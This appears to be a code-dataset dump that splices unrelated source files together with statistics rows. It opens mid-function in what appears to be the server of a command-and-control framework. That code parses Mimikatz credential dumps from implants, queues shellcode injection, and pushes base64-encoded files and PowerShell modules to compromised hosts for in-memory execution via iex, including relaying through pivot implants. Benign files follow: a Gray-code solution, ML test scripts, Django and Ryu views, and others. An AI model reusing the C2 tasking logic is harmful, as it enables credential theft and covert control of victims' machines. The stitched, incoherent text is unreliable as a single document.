elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-") or executedCmd.lower().startswith("fcomm-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
DB.update_task(taskId, outputParsed)
process_mimikatz(outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
DB.update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
def newTask(path):
all_implants = DB.get_implants_all()
commands = ""
if all_implants:
for i in all_implants:
RandomURI = i.RandomURI
Pivot = i.Pivot
EncKey = i.Key
tasks = DB.get_newtasks(RandomURI)
if RandomURI in path and tasks:
for task in tasks:
command = task[2]
user = task[3]
user_command = command
implant = DB.get_implantbyrandomuri(RandomURI)
implant_type = DB.get_implanttype(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode") or command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-command run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith("run-jxa ")) or (command.lower().startswith("clipboard-monitor ")) or (command.lower().startswith("cred-popper ")):
user_command = command[:command.index("#")]
command = "run-jxa " + command[command.index("#") + 1:]
elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file') or command.lower().startswith('fcomm-command upload-file')):
PBind = False
FComm = False
if command.lower().startswith('pbind-command upload-file'):
PBind = True
if command.lower().startswith('fcomm-command upload-file'):
FComm = True
upload_args = command \
.replace('pbind-command upload-file', '') \
.replace('fcomm-command upload-file', '') \
.replace('upload-file', '')
upload_file_args_split = upload_args.split()
if len(upload_file_args_split) < 2:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
continue
upload_file = upload_file_args_split[0]
upload_file_destination = upload_file_args_split[1]
upload_args = upload_args.replace(upload_file, '')
upload_args = upload_args.replace(upload_file_destination, '')
with open(upload_file, "rb") as f:
upload_file_bytes = f.read()
if not upload_file_bytes:
print(Colours.RED + f"Error, no bytes read from the upload file, removing task: {upload_file}" + Colours.GREEN)
DB.del_newtasks(str(task[0]))
continue
upload_file_bytes_b64 = base64.b64encode(upload_file_bytes).decode("utf-8")
if implant_type.lower().startswith('c#'):
command = f"upload-file {upload_file_bytes_b64};\"{upload_file_destination}\" {upload_args}"
elif implant_type.lower().startswith('ps'):
command = f"Upload-File -Destination \"{upload_file_destination}\" -Base64 {upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('py'):
command = f"upload-file \"{upload_file_destination}\":{upload_file_bytes_b64} {upload_args}"
elif implant_type.lower().startswith('jxa'):
command = f"upload-file {upload_file_destination}:{upload_file_bytes_b64} {upload_args}"
else:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
if PBind:
command = f"pbind-command {command}"
if FComm:
command = f"fcomm-command {command}"
filehash = hashlib.md5(base64.b64decode(upload_file_bytes_b64)).hexdigest()
user_command = f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}"
taskId = DB.insert_task(RandomURI, user_command, user)
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if len(str(taskId)) > 5:
raise ValueError('Task ID is greater than 5 characters which is not supported.')
print(Colours.YELLOW)
if user is not None and user != "":
print("Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, user, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
if (user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("fcomm-command run-exe sharpwmi.program sharpwmi action=execute")):
print(user_command[0:200])
print("----TRUNCATED----")
else:
print(user_command)
print(Colours.END)
except Exception as e:
print("Cannot print output: %s" % e)
if task[2].startswith("loadmodule "):
try:
module_name = (task[2]).replace("loadmodule ", "")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
command=""
elif task[2].startswith("run-exe Program PS "):
try:
cmd = (task[2]).replace("run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-pivot-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
doublebase64string = base64.b64encode(f"run-exe PBind PBind {modulestr}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % doublebase64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command run-exe Program PS "):
try:
cmd = (task[2]).replace("pbind-command run-exe Program PS ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
modulestr = base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command run-exe Program PS "):
try:
cmd = (task[2]).replace("fcomm-command run-exe Program PS ", "")
modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe FComm.FCClass FComm run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pslo "):
try:
module_name = (task[2]).replace("pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe Program PS loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pslo"):
try:
module_name = (task[2]).replace("pbind-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-loadmodule "):
try:
module_name = (task[2]).replace("pbind-pivot-loadmodule ", "")
if ".exe" in module_name or ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
base64string = base64.b64encode(f"run-exe PBind PBind \"loadmodule{modulestr}\"".encode("utf-8")).decode("utf-8")
command = f"run-exe PBind PBind {base64string}"
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-pslo"):
try:
module_name = (task[2]).replace("fcomm-pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"run-exe Program PS loadmodule%s\"" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-loadmodule "):
try:
module_name = (task[2]).replace("pbind-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe PBind PBind \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-command "):
try:
cmd = command.replace("pbind-command ", "")
base64string = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-connect"):
command = command.replace("pbind-connect ", "run-exe PBind PBind start ")
elif task[2].startswith("pbind-kill"):
command = command.replace("pbind-kill", "run-exe PBind PBind kill-implant")
elif task[2].startswith("fcomm-loadmodule "):
try:
module_name = (task[2]).replace("fcomm-loadmodule ", "")
if ".exe" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
elif ".dll" in module_name:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
else:
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module(module_name)
command = "run-exe FComm.FCClass FComm \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
traceback.print_exc()
elif task[2].startswith("fcomm-command "):
command = command.replace("fcomm-command ", "run-exe FComm.FCClass FComm ")
elif task[2].startswith("fcomm-connect"):
command = command.replace("fcomm-connect ", "run-exe FComm.FCClass FComm start ")
elif task[2].startswith("fcomm-kill"):
command = command.replace("fcomm-kill", "run-exe FComm.FCClass FComm kill-implant")
elif task[2].startswith("pbind-pivot-command "):
try:
cmd = command.replace("pbind-pivot-command ", "")
base64string1 = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
base64string = base64.b64encode(f"run-exe PBind PBind {base64string1}".encode("utf-8")).decode("utf-8")
command = "run-exe PBind PBind %s" % base64string
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif task[2].startswith("pbind-pivot-connect"):
command = command.replace("pbind-pivot-connect ", "run-exe PBind PBind run-exe PBind PBind start ")
elif task[2].startswith("pbind-pivot-kill"):
command = command.replace("pbind-pivot-kill", "run-exe PBind PBind run-exe PBind PBind kill-implant")
# Uncomment to print actual commands that are being sent
# if "AAAAAAAAAAAAAAAAAAAA" not in command:
# print(Colours.BLUE + "Issuing Command: " + command + Colours.GREEN)
command = taskIdStr + command
if commands:
commands += "!d-3dion@LD!-d" + command
else:
commands += command
DB.del_newtasks(str(task[0]))
if commands is not None:
multicmd = "multicmd%s" % commands
try:
responseVal = encrypt(EncKey, multicmd)
except Exception as e:
responseVal = ""
print("Error encrypting value: %s" % e)
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return responseVal
elif RandomURI in path and not tasks:
# if there is no tasks but its a normal beacon send 200
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
return default_response()
| 64.486188
| 474
| 0.499714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,882
| 0.225097
|
c4005a008048988474573247edb485bd20d1bb6d
| 1,029
|
py
|
Python
|
Leetcode/89.grayCode.py
|
Song2017/Leetcode_python
|
99d9f3cec0e47ddab6ec107392a6b33bf6c1d046
|
[
"MIT"
] | 1
|
2019-05-14T00:55:30.000Z
|
2019-05-14T00:55:30.000Z
|
LeetcodeView/89.grayCode.md
|
Song2017/Leetcode_python
|
99d9f3cec0e47ddab6ec107392a6b33bf6c1d046
|
[
"MIT"
] | null | null | null |
LeetcodeView/89.grayCode.md
|
Song2017/Leetcode_python
|
99d9f3cec0e47ddab6ec107392a6b33bf6c1d046
|
[
"MIT"
] | null | null | null |
class Solution:
'''
格雷编码是一个二进制数字系统,在该系统中,两个连续的数值仅有一个位数的差异。
给定一个代表编码总位数的非负整数 n,打印其格雷编码序列。格雷编码序列必须以 0 开头。
输入: 2
输出: [0,1,3,2]
解释: 00 - 0, 01 - 1, 11 - 3, 10 - 2
'''
def grayCode(self, n: int):
# 观察连续数值对应的格雷编码序列对应的关系
# 追加二进制位到首位, 0: 数值仍为前一个数组的值, 1: 前一个数组的每个元素 + 2的(n-1)次幂
ans, cnt = [0], 0
while cnt < n:
ad = 2**cnt
tmp = list(map(lambda x: x ^ ad, ans))
tmp.reverse()
ans += tmp
cnt += 1
return ans
def grayCodeF(self, n: int):
''''
关键是搞清楚格雷编码的生成过程, G(i) = i ^ (i/2);
如 n = 3:
G(0) = 000
G(1) = 1 ^ 0 = 001 ^ 000 = 001
G(2) = 2 ^ 1 = 010 ^ 001 = 011
G(3) = 3 ^ 1 = 011 ^ 001 = 010
G(4) = 4 ^ 2 = 100 ^ 010 = 110
G(5) = 5 ^ 2 = 101 ^ 010 = 111
G(6) = 6 ^ 3 = 110 ^ 011 = 101
G(7) = 7 ^ 3 = 111 ^ 011 = 100
'''
return [i ^ i >> 1 for i in range(2**n)]
s = Solution()
print(s.grayCode(3))
| 25.725
| 62
| 0.433431
| 1,294
| 0.970743
| 0
| 0
| 0
| 0
| 0
| 0
| 918
| 0.688672
|
c400620022eebd6f0df3a706d1f575d077a9ad78
| 6,781
|
py
|
Python
|
object/test.py
|
SkinLesionsResearch/NCPL
|
562e9664f77e14ed9b2655b82e8498b8a8ce5d2d
|
[
"MIT"
] | null | null | null |
object/test.py
|
SkinLesionsResearch/NCPL
|
562e9664f77e14ed9b2655b82e8498b8a8ce5d2d
|
[
"MIT"
] | null | null | null |
object/test.py
|
SkinLesionsResearch/NCPL
|
562e9664f77e14ed9b2655b82e8498b8a8ce5d2d
|
[
"MIT"
] | null | null | null |
import argparse
import os, sys
os.chdir("/home/jackie/ResearchArea/SkinCancerResearch/semi_skin_cancer")
sys.path.append("/home/jackie/ResearchArea/SkinCancerResearch/semi_skin_cancer")
print(os.getcwd())
import os.path as osp
import torchvision
import numpy as np
import torch
# import torch.nn as nn
# import torch.optim as optim
# from itertools import cycle
from torchvision import transforms
# import network, loss
from torch.utils.data import DataLoader
from data_list import ImageList, ImageList_idx
import random, pdb, math, copy
from evaluation.draw import draw_ROC, draw_TSNE, draw_cm
from evaluation.metrics import get_metrics, get_metrics_sev_class, get_test_data
import matplotlib.pyplot as plt
from transforms import image_test
import utils
plt.rc('font', family='Times New Roman')
def op_copy(optimizer):
for param_group in optimizer.param_groups:
param_group['lr0'] = param_group['lr']
return optimizer
def image_test(resize_size=256, crop_size=224, alexnet=False):
if not alexnet:
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
else:
normalize = Normalize(meanfile='./ilsvrc_2012_mean.npy')
return transforms.Compose([
transforms.Resize((resize_size, resize_size)),
# transforms.CenterCrop(crop_size),
transforms.ToTensor(),
normalize
])
def data_load(args):
## prepare data
dsets = {}
dset_loaders = {}
test_txt = open(osp.join(args.dset_path, 'test.txt')).readlines()
image_test_transform = image_test()
if args.net[0:5] == "senet":
image_test_transform = image_test(299)
elif args.net[0:3] == "ran":
image_test_transform = image_test(32)
dsets["test"] = ImageList(test_txt, args, transform=image_test_transform)
dset_loaders["test"] = DataLoader(dsets["test"], batch_size=args.batch_size, shuffle=True,
num_workers=args.worker, drop_last=False)
return dset_loaders
def print_args(args):
s = "==========================================\n"
for arg, content in args.__dict__.items():
s += "{}:{}\n".format(arg, content)
return s
def test_target(args):
SEED = args.seed
torch.manual_seed(SEED)
torch.cuda.manual_seed(SEED)
np.random.seed(SEED)
random.seed(SEED)
## set base network
net = utils.get_model(args.net, args.num_classes)
if args.num_classes == 2:
args.modelpath = args.output_dir_train + '/best_params_auc.pt'
else:
args.modelpath = args.output_dir_train + '/best_params.pt'
print(args.modelpath)
net.load_state_dict(torch.load(args.modelpath))
net.eval()
dset_loaders = data_load(args)
features, logits, y_true, y_predict = get_test_data(dset_loaders['test'], net)
if args.num_classes == 2:
accuracy, kappa, report, sensitivity, specificity, roc_auc, f1, recall, precision = \
get_metrics_sev_class(logits, y_true, y_predict)
else:
accuracy, kappa, report, sensitivity, specificity, roc_auc, f1, recall, precision = \
get_metrics_sev_class(logits, y_true, y_predict)
draw_ROC(logits, y_true, args.label_names, args.output_dir)
draw_cm(y_true, y_predict, args.label_names, args.output_dir)
draw_TSNE(features, y_true, args.label_names, args.output_dir)
log_str = '\nAccuracy = {:.2f}%, Kappa = {:.4f},' \
' Sensitivity = {:.4f}, Specificity = {:.4f}, AUROC = {:.4f}\n' \
' F1 = {:.4f}, Recall = {:.4f}, Precision = {:.4f}' \
.format(accuracy, kappa, sensitivity, specificity, roc_auc, f1, recall, precision)
args.out_file.write(log_str)
args.out_file.write(report)
args.out_file.flush()
print(log_str)
print(report)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='oral_cancer')
parser.add_argument('--gpu_id', type=str, nargs='?', default='0', help="device id to run")
parser.add_argument('--batch_size', type=int, default=32, help="batch_size")
parser.add_argument('--num_classes', type=int, default=7, help="number of classes")
parser.add_argument('--worker', type=int, default=12, help="number of workers")
parser.add_argument('--dir', type=str, default='./ckps/')
parser.add_argument('--subDir', type=str, default='resnet50_sev_cates_2500_0.99_naive_0_afm_0.7_u_0.3')
parser.add_argument('--dset_path', type=str, default='./data/semi_processed')
parser.add_argument('--seed', type=int, default=2021, help="random seed")
parser.add_argument('--which', type=str, default='one', choices=['one', 'all'])
parser.add_argument('--img_dir', type=str, default=None)
parser.add_argument('--save_dir', type=str, default=None)
parser.add_argument('--bin_class', type=str, default=None)
args = parser.parse_args()
if args.num_classes == 2:
args.label_names = [("not " + args.bin_class), args.bin_class]
else:
args.label_names = ['akiec', 'bcc', 'bkl', 'df', 'mel', 'nv', 'vasc']
if args.which == 'one':
args.net = osp.basename(args.subDir).split('_')[0]
# torch.backends.cudnn.deterministic = True
print(args.dir)
args.output_dir_train = os.path.join(args.dir, args.subDir)
print(args.output_dir_train)
args.output_dir = os.path.join('test', args.output_dir_train)
if not osp.exists(args.output_dir):
os.system('mkdir -p ' + args.output_dir)
if not osp.exists(args.output_dir):
os.makedirs(args.output_dir)
args.out_file = open(osp.join(args.output_dir, 'log.txt'), 'w')
args.out_file.write(print_args(args) + '\n')
args.out_file.flush()
test_target(args)
if args.which == 'all':
for dir in os.listdir(args.dir):
args.net = dir.split('_')[0]
# torch.backends.cudnn.deterministic = True
args.output_dir_train = os.path.join(args.dir, dir)
args.output_dir = os.path.join('./test', args.output_dir_train)
if not osp.exists(args.output_dir):
os.system('mkdir -p ' + args.output_dir)
if not osp.exists(args.output_dir):
os.makedirs(args.output_dir)
args.out_file = open(osp.join(args.output_dir, 'log.txt'), 'w')
args.out_file.write(print_args(args) + '\n')
args.out_file.flush()
test_target(args)
| 38.971264
| 113
| 0.626309
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,208
| 0.178145
|
c4009ade7b5eb056201eed0338579ec28e08eb56
| 226
|
py
|
Python
|
countdownhype/urls.py
|
chri4354/BeeMe_platform
|
b73843d9146c5ba54a63a8839980ee7c8024e80d
|
[
"CC-BY-4.0"
] | null | null | null |
countdownhype/urls.py
|
chri4354/BeeMe_platform
|
b73843d9146c5ba54a63a8839980ee7c8024e80d
|
[
"CC-BY-4.0"
] | 8
|
2020-06-06T01:55:55.000Z
|
2022-03-12T00:31:52.000Z
|
countdownhype/urls.py
|
chri4354/BeeMe_platform
|
b73843d9146c5ba54a63a8839980ee7c8024e80d
|
[
"CC-BY-4.0"
] | null | null | null |
from django.urls import path, re_path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('countdown/', views.countdown, name='countdown'),
#re_path(r'.+', views.redir, name='redir'),
]
| 22.6
| 58
| 0.650442
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 75
| 0.331858
|
c40260dc06f3a35df8d6b1598c7152ecade68c53
| 204
|
py
|
Python
|
argv.py
|
christoga/python
|
1395b3177e7baf46677a7a7a4ae89d2488c6f0fa
|
[
"MIT"
] | 5
|
2015-11-15T19:08:31.000Z
|
2015-11-27T02:34:28.000Z
|
argv.py
|
christoga/python
|
1395b3177e7baf46677a7a7a4ae89d2488c6f0fa
|
[
"MIT"
] | null | null | null |
argv.py
|
christoga/python
|
1395b3177e7baf46677a7a7a4ae89d2488c6f0fa
|
[
"MIT"
] | null | null | null |
from sys import argv
script, first, second, third = argv
print "This script called", script
print "The first variable :", first
print "The second variable :", second
print "The third variable :", third
| 22.666667
| 37
| 0.735294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 87
| 0.426471
|
c402fd47d18c33d2119498b3bf7f8c6a643683c4
| 545
|
py
|
Python
|
featureflow/feature_registration.py
|
featureflow/featureflow-python-sdk
|
a84cf54812fdc65d9aa52d10b17325504e67057f
|
[
"Apache-2.0"
] | null | null | null |
featureflow/feature_registration.py
|
featureflow/featureflow-python-sdk
|
a84cf54812fdc65d9aa52d10b17325504e67057f
|
[
"Apache-2.0"
] | null | null | null |
featureflow/feature_registration.py
|
featureflow/featureflow-python-sdk
|
a84cf54812fdc65d9aa52d10b17325504e67057f
|
[
"Apache-2.0"
] | 2
|
2020-06-01T05:37:16.000Z
|
2020-07-15T08:17:18.000Z
|
class FeatureRegistration:
def __init__(self, key, failoverVariant, variants=[]):
"""docstring for __init__"""
self.key = key
self.failoverVariant = failoverVariant
self.variants = [v.toJSON() for v in variants]
def toJSON(self):
"""docstring for toJSON"""
self.__dict__
class Variant:
def __init__(self, key, name):
"""docstring for __init__"""
self.key = key
self.name = name
def toJSON(self):
"""docstring for toJSON"""
self.__dict__
| 24.772727
| 58
| 0.594495
| 541
| 0.992661
| 0
| 0
| 0
| 0
| 0
| 0
| 108
| 0.198165
|
c403737a02fdcf7c798629d6151ff7c1e4a813cf
| 913
|
py
|
Python
|
ryu/gui/views/topology.py
|
uiuc-srg/ryu
|
2a597f812270ea9690269a20bf659f334c323eb6
|
[
"Apache-2.0"
] | 269
|
2015-03-08T11:32:45.000Z
|
2022-03-30T11:18:16.000Z
|
ryu/gui/views/topology.py
|
uiuc-srg/ryu
|
2a597f812270ea9690269a20bf659f334c323eb6
|
[
"Apache-2.0"
] | 4
|
2017-03-07T11:51:24.000Z
|
2020-07-07T20:13:55.000Z
|
ryu/gui/views/topology.py
|
uiuc-srg/ryu
|
2a597f812270ea9690269a20bf659f334c323eb6
|
[
"Apache-2.0"
] | 205
|
2015-01-13T04:52:25.000Z
|
2022-03-30T13:37:33.000Z
|
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import render_template, request
import view_base
class IndexView(view_base.ViewBase):
def __init__(self):
super(IndexView, self).__init__()
def run(self):
host, port = request.host.split(':')
return render_template('topology.html', host=host, port=port)
| 33.814815
| 69
| 0.739321
| 237
| 0.259584
| 0
| 0
| 0
| 0
| 0
| 0
| 616
| 0.674699
|
c4038c43fba700001a9ef9e5ce94db202c34c7bb
| 2,247
|
py
|
Python
|
allennlp/tests/modules/token_embedders/bag_of_word_counts_token_embedder_test.py
|
urigoren/allennlp
|
236e1fd01ca30409cd736625901292609009f5c4
|
[
"Apache-2.0"
] | 1
|
2020-03-30T14:07:02.000Z
|
2020-03-30T14:07:02.000Z
|
allennlp/tests/modules/token_embedders/bag_of_word_counts_token_embedder_test.py
|
urigoren/allennlp
|
236e1fd01ca30409cd736625901292609009f5c4
|
[
"Apache-2.0"
] | 123
|
2020-04-26T02:41:30.000Z
|
2021-08-02T21:18:00.000Z
|
allennlp/tests/modules/token_embedders/bag_of_word_counts_token_embedder_test.py
|
urigoren/allennlp
|
236e1fd01ca30409cd736625901292609009f5c4
|
[
"Apache-2.0"
] | 2
|
2019-12-21T05:58:44.000Z
|
2021-08-16T07:41:21.000Z
|
import numpy as np
import pytest
import torch
from numpy.testing import assert_almost_equal
from allennlp.common.checks import ConfigurationError
from allennlp.common.testing import AllenNlpTestCase
from allennlp.data import Vocabulary
from allennlp.modules.token_embedders import BagOfWordCountsTokenEmbedder
class TestBagOfWordCountsTokenEmbedder(AllenNlpTestCase):
def setUp(self):
super().setUp()
self.vocab = Vocabulary()
self.vocab.add_token_to_namespace("1")
self.vocab.add_token_to_namespace("2")
self.vocab.add_token_to_namespace("3")
self.vocab.add_token_to_namespace("4")
self.non_padded_vocab = Vocabulary(non_padded_namespaces=["tokens"])
def test_forward_calculates_bow_properly(self):
embedder = BagOfWordCountsTokenEmbedder(self.vocab)
numpy_tensor = np.array([[2, 0], [3, 0], [4, 4]])
inputs = torch.from_numpy(numpy_tensor)
embedder_output = embedder(inputs)
numpy_tensor = np.array([[0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 2, 0]])
manual_output = torch.from_numpy(numpy_tensor).float()
assert_almost_equal(embedder_output.data.numpy(), manual_output.data.numpy())
def test_zeros_out_unknown_tokens(self):
embedder = BagOfWordCountsTokenEmbedder(self.vocab, ignore_oov=True)
numpy_tensor = np.array([[1, 5], [2, 0], [4, 4]])
inputs = torch.from_numpy(numpy_tensor)
embedder_output = embedder(inputs)
numpy_tensor = np.array([[0, 0, 0, 0, 0, 1], [0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 2, 0]])
manual_output = torch.from_numpy(numpy_tensor).float()
assert_almost_equal(embedder_output.data.numpy(), manual_output.data.numpy())
def test_ignore_oov_should_fail_on_non_padded_vocab(self):
with pytest.raises(ConfigurationError):
BagOfWordCountsTokenEmbedder(self.non_padded_vocab, ignore_oov=True)
def test_projects_properly(self):
embedder = BagOfWordCountsTokenEmbedder(vocab=self.vocab, projection_dim=50)
numpy_tensor = np.array([[1, 0], [1, 0], [4, 4]])
inputs = torch.from_numpy(numpy_tensor)
embedder_output = embedder(inputs)
assert embedder_output.shape[1] == 50
| 44.94
| 93
| 0.696484
| 1,933
| 0.860258
| 0
| 0
| 0
| 0
| 0
| 0
| 20
| 0.008901
|
c404204e3c66a1ac63a04d196c9f1142497f7ef7
| 1,020
|
py
|
Python
|
dqn/ops.py
|
khurshedmemon/DQN-UN-TL
|
1a981feff66825b6c35aafd08aba29d3c08ed745
|
[
"Apache-2.0"
] | 1
|
2021-12-01T15:08:44.000Z
|
2021-12-01T15:08:44.000Z
|
dqn/ops.py
|
khurshedmemon/DQN-UN-TL
|
1a981feff66825b6c35aafd08aba29d3c08ed745
|
[
"Apache-2.0"
] | 1
|
2021-12-02T06:09:05.000Z
|
2021-12-02T06:09:05.000Z
|
dqn/ops.py
|
khurshedmemon/DQN-UN-TL
|
1a981feff66825b6c35aafd08aba29d3c08ed745
|
[
"Apache-2.0"
] | null | null | null |
import tensorflow as tf
import numpy as np
def clipped_error(x):
# Huber loss
try:
return tf.select(tf.abs(x) < 1.0, 0.5 * tf.square(x), tf.abs(x) - 0.5 )
except:
return tf.where(tf.abs(x) < 1.0, 0.5 * tf.square(x), tf.abs(x) - 0.5 )
def linear(input_, output_size, stddev=0.02, bias_start=0.0, activation_fn=None, name='linear', mask=None):
shape = input_.get_shape().as_list()
with tf.variable_scope(name):
w = tf.get_variable('Matrix', [shape[1], output_size], tf.float32,
tf.random_normal_initializer(stddev=stddev))
b = tf.get_variable('bias', [output_size],
initializer=tf.constant_initializer(bias_start))
out = tf.nn.bias_add(tf.matmul(input_, w), b)
#if mask is not None:
#out = tf.minimum(out, (2.0 * mask - 1.0) * np.finfo(np.float32).max)
if activation_fn is not None:
return activation_fn(out), w, b
else:
return out, w, b
| 32.903226
| 107
| 0.582353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 124
| 0.121569
|
c40422c343f9bc25ecff00b38032cd67afe03520
| 4,081
|
py
|
Python
|
cellsium/model/initialization.py
|
modsim/CellSium
|
8c3f4f5ccf84fa5555206d01cc3359c89071dcba
|
[
"BSD-2-Clause"
] | null | null | null |
cellsium/model/initialization.py
|
modsim/CellSium
|
8c3f4f5ccf84fa5555206d01cc3359c89071dcba
|
[
"BSD-2-Clause"
] | null | null | null |
cellsium/model/initialization.py
|
modsim/CellSium
|
8c3f4f5ccf84fa5555206d01cc3359c89071dcba
|
[
"BSD-2-Clause"
] | 1
|
2021-12-29T23:19:17.000Z
|
2021-12-29T23:19:17.000Z
|
"""Cell parameter random initializations."""
from typing import Any, Dict
import numpy as np
from ..parameters import (
Height,
NewCellBendLowerLower,
NewCellBendLowerUpper,
